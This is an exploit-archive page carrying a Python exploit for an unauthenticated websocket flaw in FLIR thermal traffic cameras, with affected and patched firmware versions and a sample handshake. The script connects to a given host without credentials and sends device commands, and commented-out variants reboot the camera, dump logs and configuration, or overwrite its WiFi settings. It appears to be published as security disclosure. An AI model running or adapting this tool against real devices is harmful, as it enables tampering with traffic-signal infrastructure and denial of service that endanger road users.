what you don't know can hurt you

FLIR Systems FLIR Thermal Traffic Cameras Websocket Device Manipulation

FLIR Systems FLIR Thermal Traffic Cameras Websocket Device Manipulation
Posted Oct 8, 2018
Authored by LiquidWorm | Site zeroscience.mk

FLIR Systems FLIR thermal traffic cameras suffers from a websocket device manipulation vulnerability.

tags | exploit
MD5 | 1758b25f8d73cbe768557470cb4ec024

FLIR Systems FLIR Thermal Traffic Cameras Websocket Device Manipulation

Change Mirror Download
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# FLIR Systems FLIR Thermal Traffic Cameras Websocket Device Manipulation
#
#
# Vendor: FLIR Systems, Inc.
# Product web page: https://www.flir.com
#
# Affected firmware version: V1.01-0bb5b27 (TrafiOne) Codename: TrafiOne
# E1.00.09 (TI BPL2 EDGE) Codename: TIIP4EDGE
# V1.02.P01 (TI x-stream) Codename: TIIP2
# V1.05.P01 (ThermiCam) Codename: ThermiCam
# V1.04.P02 (ThermiCam) Codename: ThermiCam
# V1.04 (ThermiCam) Codename: ThermiCam
# V1.01.P02 (ThermiCam) Codename: ThermiCam
# V1.05.P03 (TrafiSense) Codename: TrafiSense
# V1.06 (VIP-IP) Codename: VIP-IP
# V1.02.P02 (TrafiRadar) Codename: TrafiRadar
#
# Vendor patched firmware version:
#
# Product name Firmware Released
# ----------------------------------------------------
# ThermiCam / TrafiSense E1.06.03 17.09.2018
# TI BPL2 EDGE V1.00 17.09.2018
# TI x-stream E1.03.02 17.09.2018
# TrafiOne E1.02.02 17.09.2018
# ----------------------------------------------------
#
# Summary: FLIR TrafiOne is an all-round detection sensor for traffic monitoring
# and dynamic traffic signal control. Offered in a compact and affordable
# package, the FLIR TrafiOne uses thermal imaging and Wi-Fi technology to
# adapt traffic signals based on the presence detection of vehicles, bicycles
# and pedestrians while at the same time generating high resolution data at
# intersections and in urban environments. FLIR TrafiOne helps traffic engineers
# to improve traffic flows, reduce vehicle idling time, monitor congestion,
# enhance safety for vulnerable road users, collect data and measure travel and
# delay times for different transport modes.
#
# FLIR TrafiCam is a vehicle presence sensor that combines a CMOS camera and a
# video detector in a single unit. FLIR TrafiCam detects moving and stationary
# vehicles at signalized intersections. Via detection outputs or via IP protocol,
# vehicle presence information is transmitted to the traffic controller so that
# signal timing can be adjusted dynamically. This way, vehicle waiting time at
# traffic lights is reduced and traffic flows are optimized.
#
# FLIR TrafiSense is an integrated thermal sensor and detector for vehicle and bike
# detection. TrafiSense does not need light to operate, but uses the thermal energy
# emitted from vehicles and bicyclists. This enables the sensor to detect vehicles
# and bikes in the darkest of nights, over a long range and in the most difficult
# weather conditions. The result is reliable, 24/7 traffic detection for a wide
# range of applications.
#
# FLIR TrafiRadar vehicle presence sensor is a combination of a video sensor and
# radar. TrafiRadar is typically used for stop bar and advance vehicle presence
# detection, traffic adaptive systems, and dilemma-zone protection and thus improves
# traffic safety and efficiency at signalized intersections. TrafiRadar will warn
# traffic light controllers whenever a vehicle is present in the dilemma zone, either
# extending green or red lights to improve overall safety.and stationary vehicles at
# signalized intersections and collect traffic data at intersections or interurban
# roads. Via detection outputs or via IP protocol, vehicle presence information is
# transmitted to the traffic controller so that signal timing can be adjusted
# dynamically. TrafiCam x-stream offers streaming video at full frame rate, to be
# used for traffic monitoring in a control room.
#
# The VIP series offers multi-functional Video Image Processing modules for traffic
# control. VIP boards integrate automatic incident detection, data collection,
# recording of pre and post incident image sequences and streaming video in one
# board. VIP modules have been installed for road and tunnel projects all over the
# world.
#
# Desc: FLIR thermal traffic cameras suffer from an unauthenticated device manipulation
# vulnerability utilizing the websocket protocol. The affected FLIR Intelligent
# Transportation Systems - ITS models use an insecure implementation of websocket
# communication used for administering the device. Authentication and authorization
# bypass via referencing a direct object allows an attacker to directly modify running
# configurations, disclose information or initiate a denial of service (DoS) scenario
# with Reboot command. The devices do not support the usage of TLS 'wss://' prefix for
# WebSocket Secure connection making the network traffic disclosed in plain-text to
# MitM evil-doers. Also, the web service has an Origin validation security issue and
# is vulnerable to Cross-Site WebSocket Hijacking (CSWSH).
#
# ---
# Request:
#
# GET ws://192.168.1.1:13042/ws/xml2 HTTP/1.1
# Host: 192.168.1.1:13042
# Connection: Upgrade
# Pragma: no-cache
# Cache-Control: no-cache
# User-Agent: Bond/00.7
# Upgrade: websocket
# Origin: zeroscience.mk:1337
# Sec-WebSocket-Version: 13
# Accept-Encoding: gzip, deflate
# Accept-Language: en-US,en;q=0.9
# Cookie: tmhDynamicLocale.locale=%22en%22
# Sec-WebSocket-Key: A5SH9PRtc3rYF49kKO4vmw==
# Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
#
# Response:
#
# HTTP/1.1 101 Switching Protocols
# Server: nginx/1.10.2
# Date: Mon, 13 Aug 2018 02:48:46 GMT
# Content-Length: 0
# Connection: upgrade
# Upgrade: WebSocket
# Sec-WebSocket-Accept: QyXaTdjpCsAyxhVnVqjMg95jepk=
#
# ---
# No HTTP/1.1 401 Unauthorized response observed.
#
# Tested on: nginx/1.12.1
# nginx/1.10.2
# nginx/1.8.0
# Websocket/13 (RFC 6455)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Zero Science Lab - https://www.zeroscience.mk
#
#
# Advisory ID: ZSL-2018-5490
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5490.php
#
# Vendor firmware updates: https://www.flir.com/security/best-practices-for-cybersecurity/
# Vendor cyber hardening guide: https://www.flir.com/globalassets/security/flir-pro-security-cyber-hardening-guide.pdf
#
#
# 26.07.2018
#

from websocket import create_connection as t00t
import time
import sys

endpoint = "/ws/xml2"

if (len(sys.argv) <= 2):
print '[*] Usage: exploit.py <ipaddress> <port>'
exit(0)

host = sys.argv[1]
port = sys.argv[2]

# Supported message types:
'''
<Message Type="SupportedMessages">
<Body>
<Message Type="GetMessageConstraints"/>
<Message Type="GetSupportedMessages"/>
<Message Type="Session"/>
<Message Type="Subscription"/>
<Message Type="ClearData"/>
<Message Type="GetConnectionInformation"/>
<Message Type="GetData"/>
<Message Type="GetEvents"/>
<Message Type="GetLostData"/>
<Message Type="GetManagedBy"/>
<Message Type="GetPresenceData"/>
<Message Type="GetPresenceLevel"/>
<Message Type="GetPresenceLevelHistory"/>
<Message Type="GetStorageLimits"/>
<Message Type="SetConnectionSettings"/>
<Message Type="SetManagedBy"/>
<Message Type="ClearBootCount"/>
<Message Type="ClearHistogram"/>
<Message Type="ClearStoredCounter"/>
<Message Type="ClearSystemLogs"/>
<Message Type="CreateAviSequence"/>
<Message Type="DoBadStuff"/> <-- ;]]
<Message Type="ForceEvent"/>
<Message Type="ForceKeyframe"/>
<Message Type="GetBootCount"/>
<Message Type="GetBplSettings"/>
<Message Type="GetCameraConfiguration"/>
<Message Type="GetCameraDefinitions"/>
<Message Type="GetCameraSettings"/>
<Message Type="GetConfiguration"/>
<Message Type="GetConstraints"/>
<Message Type="GetCpuStatistics"/>
<Message Type="GetDateTime"/>
<Message Type="GetDisplayOverlay"/>
<Message Type="GetEventLog"/>
<Message Type="GetEventsDescription"/>
<Message Type="GetFrameFlow"/>
<Message Type="GetHardwareInformation"/>
<Message Type="GetHardwareSensors"/>
<Message Type="GetHistogram"/>
<Message Type="GetImage"/>
<Message Type="GetImageSharpness"/>
<Message Type="GetLeptonSettings"/>
<Message Type="GetLoggingActivation"/>
<Message Type="GetMemoryStatistics"/>
<Message Type="GetNumberOfOutputs"/>
<Message Type="GetOpenEvents"/>
<Message Type="GetOutputsState"/>
<Message Type="GetPermissions"/>
<Message Type="GetProductInformation"/>
<Message Type="GetSocketInformation"/>
<Message Type="GetState"/>
<Message Type="GetStoredCounter"/>
<Message Type="GetSystemLogs"/>
<Message Type="GetTemperature"/>
<Message Type="GetThermalQualityHistogram"/>
<Message Type="GetThermalQualityReferenceImage"/>
<Message Type="GetThreadInformation"/>
<Message Type="GetTime"/>
<Message Type="GetTranslations"/>
<Message Type="GetUpTime"/>
<Message Type="GetVersion"/>
<Message Type="GetVoltage"/>
<Message Type="GetWifiInformation"/>
<Message Type="KeepAlive"/>
<Message Type="Notify"/>
<Message Type="PauseDetectionFramework"/>
<Message Type="Reboot"/>
<Message Type="SetBplSettings"/>
<Message Type="SetCameraConfiguration"/>
<Message Type="SetCameraSettings"/>
<Message Type="SetConfiguration"/>
<Message Type="SetConstraintsFilter"/>
<Message Type="SetDateTime"/>
<Message Type="SetDisplayOverlay"/>
<Message Type="SetHardwareInformation"/>
<Message Type="SetLeptonSettings"/>
<Message Type="SetLoggingActivation"/>
<Message Type="SetTime"/>
<Message Type="SetWifiInformation"/>
<Message Type="UpdateFrameFlow"/>
</Body>
</Message>
'''

socket = t00t("ws://"+host+":"+port+endpoint)

#print 'Sending Reboot message type (DoS)...'
#msg = '<Message Type=\"Reboot\"></Message>'
#print 'Getting supported messages...'
#msg = '<Message Type=\"GetSupportedMessages\"></Message>'
#print 'Getting system logs...'
#msg = '<Message Type=\"GetSystemLogs\"></Message>'
#print 'Getting device configuration...'
#msg = '<Message Type=\"GetConfiguration\"></Message>'
#print 'Setting new Wifi information...'
#msg ='''
#<Message Type="SetWifiInformation">
# <Body Present="0" SSID="pwned" Channel="11" Hidden="0" Mode="AccessPoint" />
#</Message>
#'''

msg = '<Message Type=\"GetProductInformation\"></Message>'

socket.send(msg)
print 'Message sent.'
print 'Receiving...'
time.sleep(2)
priem = socket.recv()
print 'Received data: \n%s' % priem
socket.close()

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    21 Files
  • 2
    Apr 2nd
    35 Files
  • 3
    Apr 3rd
    21 Files
  • 4
    Apr 4th
    16 Files
  • 5
    Apr 5th
    15 Files
  • 6
    Apr 6th
    1 Files
  • 7
    Apr 7th
    2 Files
  • 8
    Apr 8th
    23 Files
  • 9
    Apr 9th
    19 Files
  • 10
    Apr 10th
    15 Files
  • 11
    Apr 11th
    14 Files
  • 12
    Apr 12th
    11 Files
  • 13
    Apr 13th
    2 Files
  • 14
    Apr 14th
    5 Files
  • 15
    Apr 15th
    14 Files
  • 16
    Apr 16th
    19 Files
  • 17
    Apr 17th
    19 Files
  • 18
    Apr 18th
    8 Files
  • 19
    Apr 19th
    4 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close